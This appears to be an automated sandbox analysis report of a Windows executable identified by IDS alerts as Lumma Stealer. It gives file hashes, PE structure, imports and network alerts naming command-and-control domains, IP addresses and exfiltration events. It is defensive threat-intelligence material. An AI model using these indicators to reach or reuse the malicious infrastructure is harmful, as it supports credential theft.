                                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.4.9.9.4.9.9.2.6.1.1.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.4.9.9.5.1.0.6.6.7.3.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.9.f.3.5.a.c.-.3.f.e.3.-.4.a.a.a.-.9.0.9.3.-.9.8.6.3.e.7.3.e.b.5.c.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.a.7.d.e.d.2.-.6.6.b.c.-.4.e.9.2.-.b.1.b.e.-.0.d.7.a.b.e.d.1.7.5.2.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.Z.1.9.n.7.X.R.T.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.c.4.-.0.0.0.1.-.0.0.1.5.-.f.1.5.e.-.8.f.b.6.0.6.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.3.4.0.a.5.0.7.5.1.2.d.6.0.6.2.5.0.7.e.8.8.8.2.f.e.e.b.8.a.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.0.5.6.d.8.e.e.3.e.8.a.8.8.b.e.c.9.2.8.c.8.c.d.5.6.e.f.e.6.0.6.4.0.0.2.6.2.f.f.b.!.5.Z.1.9.n.7.X.R.T.1...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER10C5.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8362
                                                                                                                                                                                                                                                                        Entropy (8bit):3.7020569240998515
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJAl6Im6Y2D+SUNLgmfWKnvrppDy89bydsf5mm:R6lXJK6Im6YTSUNLgmf9nvr3yWfh
                                                                                                                                                                                                                                                                        MD5:40EC0D7F44B488FACCEA90EC728810B1
                                                                                                                                                                                                                                                                        SHA1:740BDFA553B2CF57F747A0D006825DC27EC16A01
                                                                                                                                                                                                                                                                        SHA-256:579E3F04026495E58A8A2CA6B5AA067DD08A20DEE164AE7130E0F18248813F90
                                                                                                                                                                                                                                                                        SHA-512:A1340D29E263405D1DDBDA1963FF0D6B990535F212B4B3FE0603DE830156C3E9878B7B7A29F62E9E33D49E035D248BAED72D3C99DD83BDFC7A310FC761180778
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.2.4.<./.P.i.

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1162.tmp.xml

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4623
                                                                                                                                                                                                                                                                        Entropy (8bit):4.498568341186277
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsUJg77aI9qFWpW8VYl3Ym8M4Jr90OqFLu4+q8HJ2OSgT9HzY9d:uIjfSI7I07V9JCHH7dgxzY9d
                                                                                                                                                                                                                                                                        MD5:9CA45CAD9C6BB87B47ACFF2516A00A61
                                                                                                                                                                                                                                                                        SHA1:22DCECF236D3219912E52EF56B12A710C103E6CB
                                                                                                                                                                                                                                                                        SHA-256:36742F9F8EF1DB8AE6363C0403E695881DAA160637AD0510355CB1A2E105E8ED
                                                                                                                                                                                                                                                                        SHA-512:39B59A4F87C9150C523D34E8CAF6EC9CFA9B4F6DC0559D8C7A10A31841F4891D9834738AC8D973DC8A8341C7FB455E0ECE2F0810D79DAF8C8412A6BB98643E76
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="650881" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA7.tmp.dmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Sat Dec 28 08:59:10 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):108878
                                                                                                                                                                                                                                                                        Entropy (8bit):2.1818312349839863
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zfN4lYvSTBSojmFxb5/jctCyt2KwQzVZTYXK:TAYvpo6Fh5/jXygHQ5ZTYXK
                                                                                                                                                                                                                                                                        MD5:DF3976A3CDAC94CEBA4D754ED21D6E8D
                                                                                                                                                                                                                                                                        SHA1:1094F35DBCDDF6B4DBED26247FDA8AB726487E60
                                                                                                                                                                                                                                                                        SHA-256:3BDA3254933882E507BBF152F650BE4FF8375FDA8FC69655E0AA952919C509C8
                                                                                                                                                                                                                                                                        SHA-512:6984B2C62C0CBE23FF4DEC612681992DB92C9A63D6EFEFD2AE31F80EBF20688E8528ED56BACF1F3FE04A2F743C1B1408063CFDA87E288695D7B83656791B791C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:MDMP..a..... ........og........................p...........\...h$......D....Q..........`.......8...........T............G..Nb...........%...........'..............................................................................eJ......H(......GenuineIntel............T............og.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                        Entropy (8bit):4.468599018724792
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:LzZfpi6ceLPx9skLmb0f5ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNOjDH5S:nZHt5ZWOKnMM6bFpQj4
                                                                                                                                                                                                                                                                        MD5:78F4E5876ADE42D5752260ACA6285050
                                                                                                                                                                                                                                                                        SHA1:96CA07E3A41D1FF38D000D44213AD25C48A3F65C
                                                                                                                                                                                                                                                                        SHA-256:F9DF3E34BE0A180F790634A3719CC1FF89064C0EBF62DF797BD74498A22FB190
                                                                                                                                                                                                                                                                        SHA-512:D7A6E8B821677C799B2BB273858FA485D80134A0DAC86BF776A3FAE8DD27CFA063DB5536EBC8370BAC7AF26D8F6B94FB03095D9F773700A1CBD73029EF49CC8A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....Y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):6.420287070581007
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:5Z19n7XRT1.exe
                                                                                                                                                                                                                                                                        File size:375'296 bytes
                                                                                                                                                                                                                                                                        MD5:fb4f1803fbfc70bc55b61bf418d52d3d
                                                                                                                                                                                                                                                                        SHA1:056d8ee3e8a88bec928c8cd56efe606400262ffb
                                                                                                                                                                                                                                                                        SHA256:dcb4c992866efa672aa8b755cb1496eff39fc6c504c88eee5525c0a46bee1c9e
                                                                                                                                                                                                                                                                        SHA512:879da76167f90d907dbd24dab6fddea405e8ba165c06327546df342bbbf3d6f0682714fc5143d51a547450482cc9d5c6caab70aff1c209a388d4a0dfc24c0f81
                                                                                                                                                                                                                                                                        SSDEEP:6144:xl+TwMYCL9x8QRexzbzPncrU5gNw35pqvkV+05c:xAUnvdzXdbMvG+05c
                                                                                                                                                                                                                                                                        TLSH:9B84BE5179F29026FFFB8B305570D6A4597BBC63AA70808F32D0366E1E336918A61733
                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).`.mq..mq..mq...>..oq..s#..sq..s#..yq..s#...q..J.u.jq..mq...q..s#..lq..s#..lq..s#..lq..Richmq..................PE..L....|Yf...

                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                        Icon Hash:8f97312d3525191a

                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Entrypoint:0x401453
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x66597CFC [Fri May 31 07:32:12 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:9662782e6e9e28f2f28849063179bc57

                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        call 00007F2188DCE639h
                                                                                                                                                                                                                                                                        jmp 00007F2188DCBF1Dh
                                                                                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                        sub esp, 00000328h
                                                                                                                                                                                                                                                                        mov dword ptr [0044B398h], eax
                                                                                                                                                                                                                                                                        mov dword ptr [0044B394h], ecx
                                                                                                                                                                                                                                                                        mov dword ptr [0044B390h], edx
                                                                                                                                                                                                                                                                        mov dword ptr [0044B38Ch], ebx
                                                                                                                                                                                                                                                                        mov dword ptr [0044B388h], esi
                                                                                                                                                                                                                                                                        mov dword ptr [0044B384h], edi
                                                                                                                                                                                                                                                                        mov word ptr [0044B3B0h], ss
                                                                                                                                                                                                                                                                        mov word ptr [0044B3A4h], cs
                                                                                                                                                                                                                                                                        mov word ptr [0044B380h], ds
                                                                                                                                                                                                                                                                        mov word ptr [0044B37Ch], es
                                                                                                                                                                                                                                                                        mov word ptr [0044B378h], fs
                                                                                                                                                                                                                                                                        mov word ptr [0044B374h], gs
                                                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                                                        pop dword ptr [0044B3A8h]
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                                        mov dword ptr [0044B39Ch], eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                                        mov dword ptr [0044B3A0h], eax
                                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                        mov dword ptr [0044B3ACh], eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                                        mov dword ptr [0044B2E8h], 00010001h
                                                                                                                                                                                                                                                                        mov eax, dword ptr [0044B3A0h]
                                                                                                                                                                                                                                                                        mov dword ptr [0044B29Ch], eax
                                                                                                                                                                                                                                                                        mov dword ptr [0044B290h], C0000409h
                                                                                                                                                                                                                                                                        mov dword ptr [0044B294h], 00000001h
                                                                                                                                                                                                                                                                        mov eax, dword ptr [00444004h]
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [00444008h]
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                                        call dword ptr [000000BCh]

                                                                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                                        • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                                        • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                                        • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                        • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                                        • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x4285c0x50.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4230000xe788.rsrc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x410000x19c.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                        .text0x10000x3f35c0x3f400788e12e460ebcf4c3686cc62aaf106e1False0.8044520442193676data7.373879060362512IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .rdata0x410000x21a20x2200f2ee691459c316558f3c6c688c7741d2False0.3636259191176471data5.551267904276185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .data0x440000x3decd80xb800aa476e42cb3cfd0ec8d8ac4a0fb71446unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .rsrc0x4230000xe7880xe800df2c22e4407831221bcbea37944c2890False0.4050377155172414data4.5222426776239875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                        RT_CURSOR0x429e880x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                                                                                                                                                                                                                        RT_CURSOR0x429fd00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                                                                                                                                                                                                        RT_CURSOR0x42a1000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                                                                                                                                                                                                        RT_ICON0x4236300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.5578358208955224
                                                                                                                                                                                                                                                                        RT_ICON0x4244d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.6155234657039711
                                                                                                                                                                                                                                                                        RT_ICON0x424d800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.6457373271889401
                                                                                                                                                                                                                                                                        RT_ICON0x4254480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.6791907514450867
                                                                                                                                                                                                                                                                        RT_ICON0x4259b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.4371369294605809
                                                                                                                                                                                                                                                                        RT_ICON0x427f580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5166510318949343
                                                                                                                                                                                                                                                                        RT_ICON0x4290000x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.5188524590163934
                                                                                                                                                                                                                                                                        RT_ICON0x4299880x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.6125886524822695
                                                                                                                                                                                                                                                                        RT_STRING0x42c8880x454data0.45126353790613716
                                                                                                                                                                                                                                                                        RT_STRING0x42cce00x126data0.5238095238095238
                                                                                                                                                                                                                                                                        RT_STRING0x42ce080x656data0.436498150431566
                                                                                                                                                                                                                                                                        RT_STRING0x42d4600x74cdata0.43147751605995716
                                                                                                                                                                                                                                                                        RT_STRING0x42dbb00x6a4data0.4376470588235294
                                                                                                                                                                                                                                                                        RT_STRING0x42e2580x74cdata0.4229122055674518
                                                                                                                                                                                                                                                                        RT_STRING0x42e9a80x70edata0.4330011074197121
                                                                                                                                                                                                                                                                        RT_STRING0x42f0b80x84edata0.4195672624647225
                                                                                                                                                                                                                                                                        RT_STRING0x42f9080x662data0.43512851897184823
                                                                                                                                                                                                                                                                        RT_STRING0x42ff700x964data0.4068219633943428
                                                                                                                                                                                                                                                                        RT_STRING0x4308d80x66edata0.4356014580801944
                                                                                                                                                                                                                                                                        RT_STRING0x430f480x60adata0.444372574385511
                                                                                                                                                                                                                                                                        RT_STRING0x4315580x22adata0.47653429602888087
                                                                                                                                                                                                                                                                        RT_ACCELERATOR0x429e680x20data1.15625
                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x429fb80x14data1.15
                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x42c6a80x22data1.088235294117647
                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x429df00x76data0.6610169491525424
                                                                                                                                                                                                                                                                        RT_VERSION0x42c6d00x1b4data0.5711009174311926

                                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                        KERNEL32.dllDeleteVolumeMountPointA, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, GetComputerNameW, GetModuleHandleW, GetDateFormatA, LoadLibraryW, GetConsoleMode, ReadProcessMemory, GetTimeFormatW, GetConsoleAliasW, CreateProcessA, GetAtomNameW, GetStartupInfoW, GetShortPathNameA, SetLastError, GetProcAddress, SearchPathA, PulseEvent, BuildCommDCBW, GetNumaHighestNodeNumber, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, LocalAlloc, AddAtomA, FoldStringW, SetLocaleInfoW, RequestWakeupLatency, WriteConsoleOutputAttribute, FindFirstVolumeA, FindAtomW, UnregisterWaitEx, OpenFileMappingA, CreateFileA, WriteConsoleW, SetFileAttributesA, GetCommandLineW, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, LeaveCriticalSection, EnterCriticalSection, GetLocaleInfoA, InitializeCriticalSectionAndSpinCount, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, HeapSize, ReadFile, GetConsoleCP, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, GetModuleHandleA
                                                                                                                                                                                                                                                                        USER32.dllGetClassLongW
                                                                                                                                                                                                                                                                        GDI32.dllGetBitmapBits

                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                        2024-12-28T09:58:54.873140+01002058576ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)1192.168.2.6639091.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-28T09:58:55.018066+01002058584ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)1192.168.2.6561161.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-28T09:58:55.160830+01002058586ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)1192.168.2.6545031.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-28T09:58:55.305197+01002058588ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)1192.168.2.6649501.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-28T09:58:55.466978+01002058580ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)1192.168.2.6543751.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-28T09:58:55.609799+01002058590ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)1192.168.2.6541421.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-28T09:58:55.752380+01002058572ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)1192.168.2.6595691.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-28T09:58:55.898293+01002058578ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)1192.168.2.6615811.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-28T09:58:57.685554+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64970823.55.153.106443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:58:58.472225+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.64970823.55.153.106443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:00.099091+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:00.824979+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649710104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:00.824979+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:02.275276+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649716104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:03.052008+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649716104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:03.052008+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649716104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:04.694621+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649722104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:05.741502+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649722104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:07.099147+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649728104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:09.553637+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649737172.67.157.254443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:10.530843+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649737172.67.157.254443TCP

                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
